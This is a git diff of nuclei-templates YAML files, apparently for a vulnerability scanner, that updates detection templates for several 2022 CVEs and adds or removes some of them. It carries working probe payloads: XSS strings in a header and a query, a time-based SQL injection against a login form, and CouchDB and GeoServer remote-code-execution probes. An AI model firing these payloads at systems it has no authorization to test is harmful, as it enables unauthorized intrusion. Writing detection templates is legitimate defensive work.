a/nuclei-templates/CVE-2022/CVE-2022-24181.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24181.yaml @@ -1,46 +1,39 @@ id: CVE-2022-24181 - info: - name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting + name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) author: lucasljm2001,ekrause severity: medium description: | - PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + Detects an XSS vulnerability in Open Journals System. reference: - https://www.exploit-db.com/exploits/50881 - https://github.com/pkp/pkp-lib/issues/7649 - https://youtu.be/v8-9evO2oVg + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181 - https://nvd.nist.gov/vuln/detail/cve-2022-24181 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24181 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2022,xss,oss,pkp-lib,edb - + verified: true + tags: cve,cve2022,xss,oss,pkp-lib requests: - raw: - | GET /iupjournals/index.php/esj HTTP/2 Host: {{Hostname}} X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com - matchers-condition: and matchers: - type: word part: body words: - '<script>alert(document.domain)</script><x=".com/iupjournals' - - type: word part: header words: - text/html - - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24223.yaml b/nuclei-templates/CVE-2022/CVE-2022-24223.yaml index 494584ebc4..50d11c14b2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24223.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24223.yaml @@ -6,25 +6,29 @@ info: severity: critical description: | AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html - https://github.com/thedigicraft/Atom.CMS/issues/255 - https://nvd.nist.gov/vuln/detail/CVE-2022-24223 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Enes4xd/Enes4xd classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24223 cwe-id: CWE-89 - epss-score: 0.11255 - epss-percentile: 0.94623 + epss-score: 0.27442 + epss-percentile: 0.96689 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: packetstorm,cve,cve2022,sqli,atom,cms + tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft http: - raw: @@ -43,4 +47,4 @@ http: - 'status_code == 200' - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")' condition: and -# digest: 490a0046304402205f8b443e315b68277a1f55348b4617a8163179aea1c77eb7cea613885c98ab510220023f789ac98e0cbd6a4cc197d454dd415e1c6dc112af986d4e14f33d1e0f0e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24264.yaml b/nuclei-templates/CVE-2022/CVE-2022-24264.yaml index 8eded7fbf2..8b01b0a101 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24264.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24264.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24264 - https://github.com/truonghuuphuc/CVE + - https://github.com/ARPSyndicate/cvemon + - https://github.com/Nguyen-Trung-Kien/CVE-1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92674 + epss-score: 0.04717 + epss-percentile: 0.91844 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms variables: num: '999999999' @@ -61,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eed5751f32f7234c1376063a76e8fe0dbaf63926d0e5818d25a634b906064359022012a56ff255ca0fc38aff17072282647964631f9307428f4966b8578495c576d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220736b8973074f85183b4bb813328ec1a114f2ad79d996268f1acae2f5b6faae9f02202b55ebe13f22c216f153f5fd564e50bcbd4499dd04d0e794c9030858c860bed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24265.yaml b/nuclei-templates/CVE-2022/CVE-2022-24265.yaml index fd9d889d5e..9fb0696a2e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24265.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24265.yaml @@ -6,26 +6,30 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24265 - https://github.com/truonghuuphuc/CVE + - https://github.com/Nguyen-Trung-Kien/CVE-1 + - https://github.com/oxf5/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 - epss-score: 0.05971 - epss-percentile: 0.92674 + epss-score: 0.05054 + epss-percentile: 0.92726 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms http: - raw: @@ -51,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "menu/html/edit.php")' condition: and -# digest: 4a0a0047304502202a593c7265dc80c67bf4e733ca6c19612b58761d042d7cc0828ee0eb0ce1cfdc022100c49f9ca5398a477116580ff011e8774a9f75e5f45aa63c1d448004aced91ddaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef926993f56df3d6024e815c648f1444430a5c25d5001fa418f66bc26b3f9961022100c18f80d30dbafc9c6af9bcadca69526a5ee1ba114d5c6ec9aa22599cf01ebcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24266.yaml b/nuclei-templates/CVE-2022/CVE-2022-24266.yaml index 413fa9df34..c8fabc2f2b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24266.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24266.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: @@ -13,20 +15,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-24266 - https://github.com/CuppaCMS/CuppaCMS/issues/17 - https://github.com/truonghuuphuc/CVE + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.04048 - epss-percentile: 0.91144 + epss-score: 0.03412 + epss-percentile: 0.91229 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms http: - raw: @@ -52,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "list_admin_table")' condition: and -# digest: 490a0046304402200f5a7c0f4e0129764d452426c3380fea142d9215094aec1ac124cb5805cc69d2022007b4ffdececfeaaa14e6051ce385dc58ce4a3ea935f65c10376013b35805ba4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001af995ffcc1fd2b4e63125802fda7806a8bda33d6cde6d71b11627458173c3b022100c28812270e59082397fb8f39eae1d431ad18f591da96014bfaf17017f0691a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24288.yaml b/nuclei-templates/CVE-2022/CVE-2022-24288.yaml index 859598f067..8aa55a92ad 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24288.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24288.yaml @@ -3,21 +3,35 @@ id: CVE-2022-24288 info: name: Apache Airflow OS Command Injection author: xeldax - severity: critical + severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Airflow. reference: - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 + - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Hax0rG1rl/my_cve_and_bounty_poc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 + epss-score: 0.81676 + epss-percentile: 0.98279 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - shodan-query: title:"Airflow - DAGs" - tags: cve,cve2022,airflow,rce + verified: true + max-request: 2 + vendor: apache + product: airflow + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + tags: cve,cve2022,airflow,rce,apache -requests: +http: - method: GET path: - "{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command" @@ -28,5 +42,4 @@ requests: - type: word words: - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance - -# Enhanced by mp on 2022/03/23 +# digest: 4a0a00473045022014c9c4b7a70a69fdf977286bc7aabdd64059d785bff999619c167ab3393355120221008cdca1281271d3ca5ea873f99082667f92c1aff3d825665947813512c6113339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24384.yaml b/nuclei-templates/CVE-2022/CVE-2022-24384.yaml index d51d6b2175..735634f0ff 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24384.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24384.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability. reference: @@ -17,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35175 + epss-percentile: 0.34937 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: smartertools product: smartertrack shodan-query: http.favicon.hash:1410071322 - tags: cve,cve2022,xss,smartertrack + tags: cve,cve2022,xss,smartertrack,smartertools http: - raw: @@ -39,4 +41,4 @@ http: - '"type":"error","text":"Unknown survey\"><img src=x onerror=alert(document.domain)>"' - 'smartertrack' condition: and -# digest: 4a0a00473045022100fedc95e8281bb0ec97eef7d4a08fdb99ac0d02493d606c80e5a838cb5d60b6b5022079ef3bbbeb93fadfcea2b04e75102dc75f7ebbcc6382aeadb8dc992021d87386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4892f5c64f6232351379b197d1871d961f0b6c1bfe2c35aa9ec6b1fe287a6f202203f5de83f46a950369d103b2ff3e6f864c4508f0b7fbbef2ffdd5ae4281720fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2446.yaml b/nuclei-templates/CVE-2022/CVE-2022-2446.yaml new file mode 100644 index 0000000000..76d646cc38 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2446.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-2446 + +info: + name: > + WP Editor <= 1.2.9 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f3555702-4427-4569-8fd6-f84113593e9d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2446 + metadata: + fofa-query: "wp-content/plugins/wp-editor/" + google-query: inurl:"/wp-content/plugins/wp-editor/" + shodan-query: 'vuln:CVE-2022-2446' + tags: cve,wordpress,wp-plugin,wp-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2462.yaml b/nuclei-templates/CVE-2022/CVE-2022-2462.yaml index 06a2632296..fe117426c4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2462.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2462.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability. reference: @@ -19,15 +21,15 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.01386 - epss-percentile: 0.84856 + epss-score: 0.02698 + epss-percentile: 0.90234 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh http: - method: POST @@ -59,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100844c29c078fedb5c83e77a4a6895a8271e1113f5bb3caeda17b2441fdf018b88022027e808036486d12c7140bdea046245fb14a2573755bcf50c14b294b845dca772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c6ee70b9245c089a3f406d01f902c54a26c406fac6592650e59faa6311584fd022100a14c1a73652a9999f953fa755658caed5c22d516cf51b10d0c18cfc8ca40e2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24627.yaml b/nuclei-templates/CVE-2022/CVE-2022-24627.yaml index 71956dce37..251b1da63f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24627.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24627.yaml @@ -4,15 +4,41 @@ info: name: AudioCodes Device Manager Express - SQL Injection author: geeknik severity: critical - description: Detects unauthenticated SQL injection in AudioCodes Device Manager Express up to version 7.8.20002.47752. + description: | + An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form. reference: - https://seclists.org/fulldisclosure/2023/Feb/12 - https://nvd.nist.gov/vuln/detail/CVE-2022-24627 + - https://github.com/tr3ss/newclei classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-24627 - tags: cve,cve2022,sqli,audiocodes + cwe-id: CWE-89 + epss-score: 0.00109 + epss-percentile: 0.43163 + cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: audiocodes + product: device_manager_express + shodan-query: title:"Audiocodes" + tags: cve,cve2022,seclists,sqli,audiocodes + +flow: http(1) && http(2) http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "audiocodes")' + internal: true + - raw: - | POST /admin/AudioCodes_files/process_login.php HTTP/1.1 @@ -29,3 +55,4 @@ http: - "mysql_fetch" - "You have an error in your SQL syntax" condition: or +# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2467.yaml b/nuclei-templates/CVE-2022/CVE-2022-2467.yaml index 175a0dee04..17675e9e2e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2467.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2467.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0. reference: - https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md - https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html @@ -15,25 +19,31 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2467 cwe-id: CWE-89 + epss-score: 0.01309 + epss-percentile: 0.8445 + cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli + verified: true + max-request: 1 + vendor: garage_management_system_project + product: garage_management_system + tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project -requests: +http: - raw: - | - @timeout: 10s + @timeout: 15s POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334 + username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334 matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - type: word part: body @@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/12 +# digest: 4b0a00483046022100ffddfa5138b805871ea2a646da2d928f9d7c7e4984d7b39c4337da59dc6ffee00221008bb7119b74e219c4da7ebc1abe7299068e74ab28eb036cb85ad8ccdf44bea154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml b/nuclei-templates/CVE-2022/CVE-2022-24681.yaml deleted file mode 100644 index cb02386823..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-24681 - -info: - name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting - author: Open-Sec - severity: medium - description: | - ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. - reference: - - https://raxis.com/blog/cve-2022-24681 - - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - - https://manageengine.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24681 - cwe-id: CWE-79 - tags: cve,cve2022,manageengine,xss,authenticated - -requests: - - raw: - - | - POST /servlet/GetProductVersion HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - part: body - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(buildnumber, '< 6121') - - - type: word - part: body - words: - - "ManageEngine" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24706.yaml b/nuclei-templates/CVE-2022/CVE-2022-24706.yaml index 583f7ac40b..0dc99a7dc2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24706.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24706.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: @@ -19,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 - epss-score: 0.97407 + epss-score: 0.9748 + epss-percentile: 0.99964 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +30,7 @@ info: vendor: apache product: couchdb shodan-query: product:"CouchDB" - tags: cve,cve2022,network,couch,rce,kev + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" @@ -36,8 +39,7 @@ variables: tcp: - host: - "{{Hostname}}" - port: 9100 - + - "{{Host}}:9100" inputs: # auth - data: "{{name_msg}}" @@ -59,3 +61,4 @@ tcp: - "gid" - "groups" condition: and +# digest: 490a004630440220602f1a063fe87341e5ec859e52c38e96493e433e56306a897672d3b25e1421050220331d04d26d8d1693385a3bbe00a72a748c82f4586857b7fdec165de6c7b7a4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24716.yaml b/nuclei-templates/CVE-2022/CVE-2022-24716.yaml index 9563effe7c..8ced979300 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24716.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24716.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data. remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. reference: - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py @@ -18,15 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 - epss-score: 0.22705 - epss-percentile: 0.96032 + epss-score: 0.25375 + epss-percentile: 0.96582 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: icinga product: icinga_web_2 shodan-query: title:"Icinga" - tags: packetstorm,cve,cve2023,icinga,lfi + tags: cve,cve2022,packetstorm,icinga,lfi http: - method: GET @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cf74196add4b438ad90afb356f9b2d29513b2686b73c07b21c99d5e21e27033102203ce4f678a2edb32f85d880b8579f3ba2d9ab4381d1c5411101f7d079c3569bb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9539549dcfc756f1d0a2325969b03be5a4a019f130c94dca75be9859b0aa649022100dfa8df926228c77eb9d9593dcb7e8189e5d91eb3209ecf64297b5454a6c8cf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24816.yaml b/nuclei-templates/CVE-2022/CVE-2022-24816.yaml index 11d8a8b33a..e1aa6c65e5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24816.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24816.yaml @@ -1,28 +1,38 @@ id: CVE-2022-24816 info: - name: Geoserver Server - Code Injection + name: GeoServer <1.2.2 - Remote Code Execution author: mukundbhuva severity: critical description: | - Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22. + Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 + - https://github.com/tanjiti/sec_profile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 + epss-score: 0.86265 + epss-percentile: 0.98506 + cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: - fofa-query: app="GeoServer" + verified: true + max-request: 1 + vendor: geosolutionsgroup + product: jai-ext shodan-query: /geoserver/ - verified: "true" - tags: cve,cve2022,geoserver,rce + fofa-query: app="GeoServer" + tags: cve,cve2022,geoserver,rce,geosolutionsgroup -requests: +http: - raw: - | POST /geoserver/wms HTTP/1.1 @@ -71,3 +81,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450221008c43a89e6024f154e1c9ec73d2af5b54a9fe62ce9de2200c4c749d86d684bcac02206e61c587bb72efa57e89b3e5d7522186d366d6693a3fefd7dcf278d233235347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml index 867ca9a9d9..0bf893b39e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24856.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24856.yaml @@ -1,42 +1,30 @@ id: CVE-2022-24856 - info: name: Flyte Console <0.52.0 - Server-Side Request Forgery author: pdteam severity: high description: | 